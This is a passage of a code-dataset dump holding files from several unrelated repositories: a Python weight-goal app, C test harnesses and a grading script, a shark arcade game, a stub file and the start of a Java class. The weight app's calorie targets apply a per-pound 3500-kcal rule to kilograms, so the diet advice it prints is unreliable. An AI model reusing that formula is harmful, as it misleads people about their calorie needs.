\"r\")\n BMR = json.load(a)\n h = int(BMR[x][\"initialData\"][\"height\"])\n w = int(BMR[x][\"initialData\"][\"initialWeight\"])\n a = int(BMR[x][\"initialData\"][\"Age\"])\n # Daily calorie targets below use the Mifflin-St Jeor BMR equation:\n # BMR = 10*weight(kg) + 6.25*height(cm) - 5*age + 5 (men) or - 161 (women)\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"maintain\":\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to maintain your current weight :) \\n\")\n elif BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to maintain your current weight :) \\n\")\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"lose\":\n lose = int(BMR[x][\"initialData\"][\"Weight_You_Want_To_Lose_Per_Week\"])\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5 - (lose * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to lose\", lose,\n \" Kgs from your current weight per week:)\\nWe suggest you use the 'FitnessPall' application 
to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161 - (lose * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to lose\", lose,\n \" Kgs from your current weight per week:)\\nWe suggest you use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"initialWeightGoal\"] == \"gain\":\n gain = int(BMR[x][\"initialData\"][\"Weight_You_Want_To_Gain_Per_Week\"])\n if BMR[x]['dataOptions'][\"gender\"] == \"male\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a + 5 + (gain * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to gain\", gain,\n \" Kgs from your current weight per week:)\\nWe suggest you use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories.\")\n if BMR[x]['dataOptions'][\"gender\"] == \"female\":\n CalorieIn = float(10 * w + 6.25 * h - 5 * a - 161 + (gain * 3500) / 7)\n CalorieIn = \"{:.2f}\".format(CalorieIn)\n print(\"\\nYou should eat:\", CalorieIn, \"Calories Per day, to gain\", gain,\n \" Kgs from your current weight per week:)\\nWe suggest you use the 'FitnessPall' application to track your calories.\\nYou simply input your consumed food and it calculates the calories. \")\n\n\ndef TipOfTheDay():\n with open('datas.json', 'r') as file:\n tips = json.load(file)\n dailytips = tips[\"TipsOfTheDay\"]\n j = random.choices(tips[\"TipsOfTheDay\"][\"aidDigestion\"])\n w = random.choices(tips[\"TipsOfTheDay\"][\"essentialOils\"])\n print(\"\\nToday's Tip of the day is :\", ', '.join(j))\n print(\"\\nand a fact about essential oils is:\", ', '.join(w))\n print(\"Dear user, thank you for using HealthyWeight :) Hope to see you soon!\")\n\n\ndef NewUser():\n user_options = loadOptions()\n username, options = AskForDataOptions(user_options)\n SaveOptions(options)\n initial = AskForinitialData(username)\n SaveInitial(username, initial)\n CalculatingBMI(username)\n CalculatingBMR(username)\n TipOfTheDay()\n\n\ndef Save_New_Data(New_Weight, name):\n with open(\"users.json\") as a:\n load = json.load(a)\n load[name][\"initialData\"][\"initialWeight\"] = New_Weight\n file = open('users.json', 'w')\n file.write(json.dumps(load))\n file.close()\n\ndef Create_New_Username():\n print(\"\\nFile doesn't exist! So you do not have an account :( \")\n while True:\n create = input(\"\\nDo you want to create a new account? Please answer in yes or no: \")\n if create == \"yes\":\n NewUser()\n break\n elif create == \"no\":\n print(\"\\nOkay, see you next time :)\")\n break\n else:\n print(\"\\nplease answer in yes or no form.\")\n\ndef CheckIfGoalisReached(New_Weight, name, Old_Weight):\n difference = New_Weight - Old_Weight\n with open(\"users.json\") as a:\n load = json.load(a)\n Goal = load[name][\"dataOptions\"][\"initialWeightGoal\"]\n if difference > 0 and (Goal == \"maintain\" or Goal == \"lose\"):\n print(\"\\nDear user, you have gained : \", difference, \"Kgs since we last saw you. 
You have to work harder to reach your goal\\nwhich was to\", Goal, \"weight.\\nWork harder and you'll get there!\")\n if difference > 0 and Goal == \"gain\":\n print(\"\\nDear user, you have gained : \", difference, \"Kgs since we last saw you!\\nYou're on the right track as your goal was to\", Goal, \"your weight :) Keep on going :)\")\n if difference < 0 and (Goal == \"maintain\" or Goal == \"gain\"):\n print(\"\\nDear user, you have lost: \", abs(difference),\n \"Kgs since we last saw you. You have to work harder to reach your goal,\\nwhich was to \" + Goal + \" weight.\\nWork harder and you'll get there!\")\n if difference < 0 and Goal == \"lose\":\n print(\"\\nDear user, you have lost : \", abs(difference),\n \"Kgs since we last saw you!\\nYou're on the right track as your goal was to lose \"\n \"weight :) Keep on going :)\")\n\ndef Load_Old_Data(name):\n with open(\"users.json\") as a:\n load = json.load(a)\n Old_Weight = load[name][\"initialData\"][\"initialWeight\"]\n print('Your initial weight was : ', Old_Weight)\n while True:\n change = input(\"Do you want to change it? Please answer in yes or no : \")\n if change == \"yes\":\n while True:\n New_Weight = input(\"Insert your current weight in kg in numeric integer form : \")\n if New_Weight.isnumeric():\n New_Weight = int(New_Weight)\n CheckIfGoalisReached(New_Weight, name, Old_Weight)\n Save_New_Data(New_Weight, name)\n TipOfTheDay()\n break\n else:\n print(\"\\nPlease write in kg in a numeric integer form :(\")\n break\n elif change == \"no\":\n print(\"Okay, you can change it whenever you want :) \\n\")\n TipOfTheDay()\n break\n else:\n print(\"\\nPlease try it again and answer in the form of yes or no :)\")\ndef UsernameisNone():\n while True:\n end = input(\"\\nSorry, this username doesn't exist. Type 0 to end the Application\\nType 1 to create a new username.\")\n if end.isnumeric():\n end = int(end)\n if end == 0:\n print(\"\\nDear user, thank you for using HealthyWeight :) Hope to see you soon!\")\n break\n elif end == 1:\n NewUser()\n break\n else:\n print(\"please input an INTEGER.\")\n\ndef OldUser():\n a = os.listdir()\n if \"users.json\" in a:\n with open(\"users.json\") as file:\n user = json.load(file)\n while True:\n name = input(\"\\nplease type your previously created username : \")\n if user.get(name) is None:\n UsernameisNone()\n else:\n Load_Old_Data(name)\n break\n else:\n Create_New_Username()\n\ndef Check():\n print(\"\\nThis Application helps you reach your weight goal. :)\")\n while True:\n MAIN = input(\"Have you used our app before? Please answer in yes or no : \")\n if MAIN == \"no\":\n NewUser()\n break\n elif MAIN == \"yes\":\n OldUser()\n break\n else:\n print(\"\\nSorry, try again! Please type yes or no (not capital).\")\n\ndef MAIN():\n Check()\nMAIN()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7857142686843872,
"alphanum_fraction": 0.7857142686843872,
"avg_line_length": 34,
"blob_id": "c503a1b035871ee1702827b77fddfecf5942837c",
"content_id": "78c6f74166c58acb2f7760bdf801e46bacf3abe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 2,
"path": "/README.md",
"repo_name": "shantaladajian/HealthyWeight",
"src_encoding": "UTF-8",
"text": "# HealthyWeight\nThis Application helps you reach your weight goal. :)\n"
}
] | 2 |
ensaicluster/Corrections
|
https://github.com/ensaicluster/Corrections
|
6d173fd61f117757acbae1316454c8bb36aa1dcc
|
9eb148182df16599ae23b2ca5620dc226d740d4c
|
b996ab217d72d7a2ac184a04ef14162e0ff28f5d
|
refs/heads/master
| 2020-03-24T00:33:22.248655 | 2018-09-25T10:59:09 | 2018-09-25T10:59:09 | 142,296,235 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5531914830207825,
"avg_line_length": 14.777777671813965,
"blob_id": "25b9b7cd729f597e56e92a3ab6b995bd54968c25",
"content_id": "11cc68392de6ec1d60c0ca9f6b4fdabee089b4fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main8.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 0, 0, 1, -1};\n \n ct_cellularx(tab, 5, 10);\n return 0;\n}"
},
{
"alpha_fraction": 0.4553571343421936,
"alphanum_fraction": 0.5535714030265808,
"avg_line_length": 11.55555534362793,
"blob_id": "f761547714d368998d114e11e0d35109f1a5ed8d",
"content_id": "b164be92160ad5f8456b70abfbe92308e5467e1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 112,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main7.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test7[3] = {397, 0, 38};\n \n\tct_alice(test7, 3);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5490196347236633,
"avg_line_length": 10.44444465637207,
"blob_id": "2c85c6ef9e16f32322bb9d04a15dc57f17b6a926",
"content_id": "ad4a4e16aaed81451049d5049228be9eb27922cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main6.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test6[0] = {};\n \n\tct_alice(test6, 0);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.5538912415504456,
"alphanum_fraction": 0.5845001339912415,
"avg_line_length": 32.39130401611328,
"blob_id": "e4cfe52ebefea4a86286ffb06246d7f31a85e751",
"content_id": "e7b49431c2e7bc6a8b71ce6e69b0b1f4798e6f01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3071,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 92,
"path": "/Georgette.py",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "import os\n\nclass Parser:\n def __init__(self, fichier):\n self.proj_name = \"\"\n self.nb_std_tests = 0\n self.nb_err_tests = 0\n self.tests = list()\n try:\n with open(fichier, 'r') as fd:\n self.lines = fd.readlines()\n self.read = 1\n except:\n print(\"Erreur: impossible d'ouvrir le fichier correction.\")\n self.read = 0\n \n def get_value(self, l):\n current_line = self.lines[l]\n words = current_line.split(\"=\")\n words[1] = words[1].rstrip('\\n')\n return(words[1])\n \n def aff_details(self):\n print(\"#\"*50)\n print(\" \"*(25-(len(self.proj_name)/2))+self.proj_name)\n print(\"#\"*50)\n print(\"NOTATION : \"+str(self.nb_std_tests)+\" tests standards, \"+str(self.nb_err_tests)+\" tests d'erreurs.\") \n \n def start(self):\n if (self.read == 1):\n proj_infos = []\n for i in range(3):\n proj_infos.append(self.get_value(i))\n self.proj_name = proj_infos[0]\n self.nb_std_tests = int(proj_infos[1])\n self.nb_err_tests = int(proj_infos[2])\n for i in range(self.nb_std_tests + self.nb_err_tests):\n self.tests.append(list())\n for j in range(3):\n self.tests[i].append(self.get_value(j+4+(i*3)))\n self.aff_details()\n\nclass Test:\n def __init__(self, current_test, test_nb):\n self.test_nb = test_nb\n self.name = current_test[0]\n self.pts = int(current_test[1])\n self.tested_values = current_test[2]\n self.outfile = \"out\"+str(self.test_nb)\n self.corrfile = \"Correction/corrtest\"+str(self.test_nb)\n \n def aff_test(self):\n print(\"_\"*50+\"\\n\")\n print(\"## \"+self.name)\n print(\"## Note sur : \"+str(self.pts)+\" points\")\n print(\"## Valeurs de test : \"+self.tested_values)\n \n def do_test(self):\n pts = 0\n print(\"Compilation du projet...\")\n os.system(\"gcc -std=c99 Correction/MainTest/main\"+str(self.test_nb)+\".c *.c\")\n print(\"Ok!\\nTesting...\")\n os.system(\"./a.out > \"+self.outfile)\n res = os.popen(\"diff \"+self.outfile+\" \"+self.corrfile).readlines()\n if len(res) == 0:\n print(\"\\033[92m\"+\"SUCCESS !\"+\"\\033[0m\")\n pts += self.pts\n print(\"Vous avez obtenu \"+\"\\033[92m\"+str(self.pts)+\" points\"+\"\\033[0m\"+\".\")\n else:\n print(\"\\033[91m\"+\"FAILURE !\"+\"\\033[0m\")\n print(\"Vous n'avez pas obtenu \"+\"\\033[91m\"+str(self.pts)+\" points\"+\"\\033[0m\"+\".\")\n return pts\n\n def start(self):\n self.aff_test()\n return self.do_test()\n \ndetails = Parser(\"Correction/correction\")\ndetails.start()\npts = 0\ntotalpts = sum(int(details.tests[i][1]) for i in range(details.nb_std_tests + details.nb_err_tests))\nprint(\"\\n\"+\"#\"*50+\"\\n\"+\"TESTS STANDARDS\\n\"+\"#\"*50)\nfor i in range(details.nb_std_tests):\n testing = Test(details.tests[i], i+1)\n pts += testing.start()\nif (details.nb_err_tests > 0):\n print(\"\\n\"+\"#\"*50+\"\\n\"+\"TESTS DE GESTION D'ERREUR\\n\"+\"#\"*50)\n for j in range(i + 1, details.nb_std_tests + details.nb_err_tests):\n testing = Test(details.tests[j], j+1)\n pts += testing.start()\n \nprint(\"\\n\"+\"#\"*50+\"\\n\"+\"NOTE FINALE : \"+\"\\033[36m\"+str(pts)+\"/\"+str(totalpts)+\" points\"+\"\\033[0m\"+\".\\n\"+\"#\"*50)"
},
{
"alpha_fraction": 0.4146341383457184,
"alphanum_fraction": 0.5447154641151428,
"avg_line_length": 12.777777671813965,
"blob_id": "ded290386e62542312f79e3bdb2453e76e249267",
"content_id": "60ac55adbabb25284e90e0dec1f6c4d9bc388fbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main1.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test1[6] = {15, 20, 35, 11, 28, 1};\n \n\tct_alice(test1, 6);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.36690646409988403,
"alphanum_fraction": 0.5395683646202087,
"avg_line_length": 14.55555534362793,
"blob_id": "e90c44ae201819480746d80c6c16c02e7685e139",
"content_id": "32095450df9bd6dae88ccd5cd1a15a529b5a6489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main2.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test2[10] = {11, 12, 22, 29, 31, 27, 7, 9, 2, 37};\n \n\tct_alice(test2, 10);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.47663551568984985,
"alphanum_fraction": 0.5514018535614014,
"avg_line_length": 11,
"blob_id": "5d186b567ea2716bef790ce7ecb9eed13df4fbd0",
"content_id": "596d690e334f8f5092e9fbd65528cdc455b27927",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 107,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main4.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test4[2] = {1, 37};\n \n\tct_alice(test4, 2);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.36690646409988403,
"alphanum_fraction": 0.5395683646202087,
"avg_line_length": 14.55555534362793,
"blob_id": "2f317b6e68e97ad4e55bdb22245c4b4c80ed5589",
"content_id": "8fc867a72ab6263e84af924a951ccaddb570e31b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main3.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test3[10] = {13, 10, 6, 3, 32, 25, 18, 21, 23, 1};\n \n\tct_alice(test3, 10);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.2771739065647125,
"alphanum_fraction": 0.52173912525177,
"avg_line_length": 19.55555534362793,
"blob_id": "6210d32bb5e784089bb2cc99f1aec287b9f13801",
"content_id": "002f55c77caa27afbfbb9e516695f5d85a9d9e1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main5.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test5[22] = {20, 21, 23, 24, 26, 28, 32, 34, 35, 36, 4, 5, 6, 8, 10, 13, 15, 16, 18, 17, 6, 1};\n \n\tct_alice(test5, 22);\n\treturn 0;\n}"
},
{
"alpha_fraction": 0.45695364475250244,
"alphanum_fraction": 0.5364238619804382,
"avg_line_length": 15.88888931274414,
"blob_id": "c2460c6c759bf1492cbe4d0bf0de1adb41a65ba9",
"content_id": "1ffa4d931a0a8013eb45d595e8d10d4be897bc09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main1.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 0, 0, 0, 1, 0, 0, 0, 0};\n \n ct_cellularx(tab, 9, 5);\n return 0;\n}"
},
{
"alpha_fraction": 0.5036496520042419,
"alphanum_fraction": 0.5620437860488892,
"avg_line_length": 14.333333015441895,
"blob_id": "199f4febfb22438f94eac3cd3d0355ab624e0567",
"content_id": "25ec628de52d5fc2e41f10463f68a2eca8b5fdd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 9,
"path": "/CellularX/Correction/MainTest/main3.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_cellularx(int cells[], int taille, int t);\n\nint main()\n{\n int tab[] = {0, 1, 1, 0};\n \n ct_cellularx(tab, 4, 15);\n return 0;\n}"
},
{
"alpha_fraction": 0.4811320900917053,
"alphanum_fraction": 0.5471698045730591,
"avg_line_length": 10.88888931274414,
"blob_id": "3cc6f3035307be221f32ebf9704574988f2eec57",
"content_id": "30cba61e8590750ad5aa4ae2e39dfd629ab14748",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 9,
"path": "/AliceWeederland/Correction/MainTest/main8.c",
"repo_name": "ensaicluster/Corrections",
"src_encoding": "UTF-8",
"text": "void ct_alice(int tab[], int);\n\nint main()\n{\n\tint test8[2] = {1, 8};\n \n\tct_alice(test8, 2);\n\treturn 0;\n}"
}
] | 12 |
mnajib2018/Python-Graphics-Ocean-Shark-Attack-
|
https://github.com/mnajib2018/Python-Graphics-Ocean-Shark-Attack-
|
5a21be62e5d78fd1ef7f70e84c1375a9811cc068
|
5ae1389aa7d4cfbbc9099e81e281bd0e1cf9bfc5
|
7bb0c98f1130ce21c8aa9db66decc144161e4ba7
|
refs/heads/master
| 2021-01-10T06:47:01.481889 | 2015-12-24T21:20:46 | 2015-12-24T21:20:46 | 48,557,059 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3541905879974365,
"alphanum_fraction": 0.36289703845977783,
"avg_line_length": 34.0363655090332,
"blob_id": "63080cbc9d95888c26ad843838a491311183a92a",
"content_id": "3e09c13900b640068e2c3dfd5114326c2eb964f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10453,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 220,
"path": "/shark_attack.py",
"repo_name": "mnajib2018/Python-Graphics-Ocean-Shark-Attack-",
"src_encoding": "UTF-8",
"text": "#Final Project: Deadly Shark Attack\n#By Muhammad Najib\n#Preview of game\n#As a deadly Shark, you have to eat all the fish in the pond,\n#Move arrow keys to move the shark. If purple fish is eaten, two yellow fishes are born,\n#If a yellow fish is eaten, a starfish is born, but eating starfish doesn´t result in a new fish\n#Each fish is worth 10 points. Game ends once all fishes have been eaten.\n\nimport random, math\nfrom livewires import games, color\n\n#make a screen with the mentioned width and height\ngames.init(screen_width = 800, screen_height = 600, fps = 50)\n\n\nclass Fish(games.Sprite):\n \"\"\" A fish which floats across the screen. \"\"\"\n #Three different sizes for fish and each has different type/color\n SMALL = 1\n MEDIUM = 2\n LARGE = 3\n images = {SMALL : games.load_image(\"starfish.jpg\"),\n MEDIUM : games.load_image(\"Yellowfish.jpg\"),\n LARGE : games.load_image(\"Purplefish.png\") }\n #Common value for speed and offspring of a fish\n SPEED = 10\n SPAWN = 2\n \n def __init__(self, x, y, size):\n \"\"\" Initialize fish sprite. \"\"\"\n #Takes value of x, y and size from main func\n super(Fish, self).__init__(\n image = Fish.images[size],\n x = x, y = y,\n dx = random.choice([1, -1]) * Fish.SPEED * random.random()/size, \n dy = random.choice([1, -1]) * Fish.SPEED * random.random()/size)\n \n self.size = size\n\n def update(self):\n \"\"\" Wrap around screen. \"\"\" \n if self.top > games.screen.height:\n self.bottom = 0\n \n if self.bottom < 0:\n self.top = games.screen.height\n\n if self.left > games.screen.width:\n self.right = 0\n\n if self.right < 0:\n self.left = games.screen.width\n\n\n\n def die(self):\n \"\"\" Destroy fish. \"\"\"\n # if fish isn't smallest, replace with two smaller fishes\n if self.size != Fish.SMALL:\n for i in range(Fish.SPAWN):\n \n new_fish = Fish(x = random.randrange(games.screen.width),\n y = random.randrange(games.screen.height),\n size = self.size - 1)\n games.screen.add(new_fish)\n self.destroy()\n\n \n\n\n\nclass Shark(games.Sprite):\n \"\"\" The player's shark. \"\"\"\n image = games.load_image(\"Shark.bmp\")\n\n #Rotation step and velocity steps are used in seperate funcs below\n ROTATION_STEP = 20\n VELOCITY_STEP = 5\n \n\n def __init__(self, x, y):\n \"\"\" Initialize ship sprite. \"\"\"\n super(Shark, self).__init__(image = Shark.image, x = x, y = y)\n self.missile_wait = 0\n self.angle = 90\n \n\n self.score = games.Text(value = 0, size = 25, color = color.black,\n top = 5, right = games.screen.width - 10)\n self.total = games.Text(value = 8, size = 25, color = color.black, top = 5, left = 0)\n games.screen.add(self.score)\n self.start_game()\n #games.screen.add(self.death)\n\n\n def update(self):\n \"\"\" Rotate and thrust based on keys pressed. 
\"\"\"\n # rotate based on left and right arrow keys\n if games.keyboard.is_pressed(games.K_LEFT):\n self.angle -= Shark.ROTATION_STEP \n if games.keyboard.is_pressed(games.K_RIGHT):\n self.angle += Shark.ROTATION_STEP\n\n # apply thrust based on up arrow key\n if games.keyboard.is_pressed(games.K_UP):\n # change velocity components based on ship's angle\n angle = self.angle * math.pi / 180 # convert to radians\n self.dx += Shark.VELOCITY_STEP* math.sin(angle)\n self.dy += Shark.VELOCITY_STEP* -math.cos(angle)\n\n if games.keyboard.is_pressed(games.K_DOWN):\n #stop the shark from thrusting forward\n self.dx = self.dy = 0\n\n\n # wrap the shark around screen \n if self.top > games.screen.height:\n self.bottom = 0\n \n if self.bottom < 0:\n self.top = games.screen.height\n\n if self.left > games.screen.width:\n self.right = 0\n\n if self.right < 0:\n self.left = games.screen.width \n\n # check if ship overlaps any other object\n if self.overlapping_sprites :\n for sprite in self.overlapping_sprites:\n #every sprite except score and death counter are destroyed on contact\n if sprite != self.score and sprite != self.total:\n sprite.die()\n #Adds 10 to the score\n self.score.value += 10\n self.total.value -= 1\n if sprite.size != Fish.SMALL:\n self.total.value += 2\n if self.total.value == 0:\n self.die()\n self.end_game()\n \n self.score.right = games.screen.width - 10 \n \n\n def die(self):\n \"\"\" Destroy shark. \"\"\"\n self.destroy()\n\n \n def end_game(self):\n \"\"\" End the game. \"\"\"\n end_message = games.Message(value = \"Game Over. Final Score: \",\n size = 90,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2-90,\n lifetime = 20,\n after_death = games.screen.quit)\n \n end_message_2 = games.Message(value = self.score.value,\n size = 90,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 20,\n after_death = games.screen.quit)\n games.screen.add(end_message)\n games.screen.add(end_message_2)\n\n def start_game(self):\n start_message = games.Message(value = \"Deadly Shark Attack\"\n \"Press arrow keys to move\",\n size = 50,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 5,\n )\n games.screen.add(start_message)\n\n\n start_message = games.Message(value = \"Deadly Shark Attack\"\n \"Press arrow keys to move\",\n size = 50,\n color = color.red,\n x = games.screen.width/2,\n y = games.screen.height/2,\n lifetime = 5,\n )\n games.screen.add(start_message)\n \n \n \n\n\ndef main():\n # establish background\n nebula_image = games.load_image(\"Tank.jpg\")\n games.screen.background = nebula_image\n\n # create 8 fishes\n for i in range(8):\n x = random.randrange(games.screen.width)\n y = random.randrange(games.screen.height)\n size = random.choice([Fish.SMALL, Fish.MEDIUM, Fish.LARGE])\n new_fish = Fish(x = x, y = y, size = size)\n games.screen.add(new_fish)\n\n\n \n # create the shark\n the_shark = Shark(x = 50, y = 50)\n games.screen.add(the_shark)\n \n games.screen.mainloop()\n\n# kick it off!\nmain()\n\n \n"
}
] | 1 |
razvannorses/Python-3
|
https://github.com/razvannorses/Python-3
|
7766178b835355f9b1c90fa294787240d38f485c
|
d9e8043965fa066e3ed6017a9690648c66c2ac6d
|
2fbcecee9a7a6920b352017c3e456875d27ac581
|
refs/heads/master
| 2020-03-30T09:36:48.905258 | 2018-10-02T08:26:27 | 2018-10-02T08:26:27 | 151,083,056 | 0 | 0 | null | 2018-10-01T12:15:50 | 2018-10-01T14:36:37 | 2018-10-02T08:27:27 |
Python
|
[
{
"alpha_fraction": 0.6078431606292725,
"alphanum_fraction": 0.6470588445663452,
"avg_line_length": 5.866666793823242,
"blob_id": "303cb5c013aee068f3bf96f9e4c7a64219b0f20a",
"content_id": "77801085989f6220d3542421e627b6c62f05124b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 15,
"path": "/main.py",
"repo_name": "razvannorses/Python-3",
"src_encoding": "UTF-8",
"text": "a=5\nprint(a)\nb=7\n#print(a+b)\nc=15;\nprint(c)\nprint (type(c))\nprint (type(b))\nefgggjjj\n\ng\nfgfgfg\n\n\ntrtre"
}
] | 1 |
prangarajan21/VCFC-smoketest-master
|
https://github.com/prangarajan21/VCFC-smoketest-master
|
ba0a76663c97518b873a9b1fe33ee3de040cbf95
|
92ffd5040d00df9604d08251cc9a9e8fbbcf9854
|
586b09c473dd3abff3c78e158fe8255224905804
|
refs/heads/master
| 2020-05-20T17:11:59.021624 | 2017-09-20T15:29:38 | 2017-09-20T15:29:38 | 84,909,901 | 1 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7280553579330444,
"alphanum_fraction": 0.7340507507324219,
"avg_line_length": 31.68844223022461,
"blob_id": "625bebe78493408844dd598368fe1aba87c3b9e1",
"content_id": "382b6c23a683857142373445c27a8ca65ad217c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 6505,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 199,
"path": "/src/test/java/com/pluribus/vcf/pagefactory/VCFIaIndexPage.java",
"repo_name": "prangarajan21/VCFC-smoketest-master",
"src_encoding": "UTF-8",
"text": "package com.pluribus.vcf.pagefactory;\nimport com.jcabi.log.Logger;\nimport com.pluribus.vcf.helper.PageInfra;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport org.apache.commons.lang3.StringUtils;\nimport org.openqa.selenium.By;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\nimport com.pluribus.vcf.helper.PageInfra;\nimport org.openqa.selenium.WebDriver;\nimport org.openqa.selenium.WebElement;\nimport org.openqa.selenium.support.FindBy;\nimport org.openqa.selenium.support.How;\nimport org.openqa.selenium.support.PageFactory;\nimport org.openqa.selenium.support.ui.ExpectedConditions;\nimport org.openqa.selenium.support.ui.WebDriverWait;\nimport java.util.concurrent.TimeUnit;\nimport java.awt.Robot;\nimport java.awt.Toolkit;\nimport java.awt.datatransfer.StringSelection;\nimport java.awt.event.KeyEvent;\n\n\npublic class VCFIaIndexPage 